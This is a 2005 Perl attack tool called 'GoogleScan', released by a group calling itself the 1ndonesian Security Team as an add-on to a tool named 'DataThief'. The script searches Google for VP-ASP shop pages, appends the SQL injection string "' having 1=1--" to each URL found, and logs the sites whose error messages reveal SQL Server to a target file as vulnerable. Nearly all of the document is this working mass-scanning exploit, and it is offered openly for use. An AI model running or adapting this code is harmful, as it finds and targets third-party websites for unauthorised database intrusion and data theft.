$Id: bosen-tool.6,v1 17/05/2005 bosen Exp $ 1ndonesian Security Team (1st) Bosen Tools #6 GoogleScan 17/05/2005 [1st] Scan using google for exploitable sql injection _______________________________________________________________________________ #!/usr/bin/perl $VERSION = "1.1"; use BRAIN; die() if no BRAIN; print " 1ndonesian Security Team (1st) - http://bosen.net/releases/ =========================================================== GoogleScan $VERSION A DataThief Add-On by Bosen. "; use LWP; use HTTP::Request; use HTTP::Response; $|=1; # biar AresU bingung :P $pp = 10; $google = "http://www.google.com/search?num=".$pp; $google .= "&hl=en&filter=0&lr=&ie=UTF-8&oe=utf-8&as_qdr=all&btnG=Search&q=allinurl:"; $counter= "&sa=N&start="; # wat we look for :P ### VPASP ### $look4 = "shopexd.asp?id="; #$look4 = "shopaddtocart%20asp"; #$look4 = "shopaddtocart.asp?ProductID="; #$look4 = "shopaddtocart.asp"; ### METACART #$look4 = "productsByCategory.asp?strSubCatalogID="; $bosen = LWP::UserAgent->new(); $bosen->agent("DataThief/$VERSION "); $lastpage = 0; $cnt = 0; while ($cnt < 1000) { $urlnya = $google.$look4.$counter.$cnt; print "\nprocessing $urlnya\n"; @ures = getData($urlnya); goScan(); if ($lastpage) { print "\ndat's a rap!\n"; exit(); }; $cnt += $pp; }; sub getData($$) { my($url) = @_; my @urls; $gembel = HTTP::Request->new(GET => $url); $data = $bosen->request($gembel); if ($data->content_type eq 'text/html') { $biji = $data->content; if ($biji =~ m/we have omitted some/) { $lastpage = 1; } # i let you with these bug :P while ($biji =~ m#href=(http://\S+shopexd.asp\S+)#g) { next if $1 =~ m#http://.*http://#i; $1 =~ m/(.*)shopexd.asp/; push(@urls,$1); } } return @urls; } sub goScan() { for $url (@ures) { # hehe another bug for you :P $url .= "shopexd.asp?id=' having 1=1--"; print "\nchecking $url ... "; $gembel = HTTP::Request->new(GET => $url); $data = $bosen->request($gembel); require HTML::Parse; require HTML::FormatText; $rio = HTML::Parse::parse_html($data->content); $gendut = HTML::FormatText->new(leftmargin=>0,rightmargin=>500); $biji = $gendut->format($rio); if ($biji =~ m/JET Database/) { print "not vuln"; next; } if ($biji =~ m/Access Driver/) { print "not vuln"; next; } if ($biji =~ m/ADODB/) { print "not vuln"; next; } if ($biji =~ m/SQL Server/) { print "vuln"; open(LOG,">>target.out"); print LOG "$url\n"; print LOG "$biji\n\n"; close(LOG); next; } print "not vuln"; # Keep the rest for debug open(LOG,">>reseh.out"); print LOG "$url\n"; print LOG "$biji\n\n"; close(LOG); } } Bosen ====================== Original document can be fount at http://bosen.net/releases/?id=52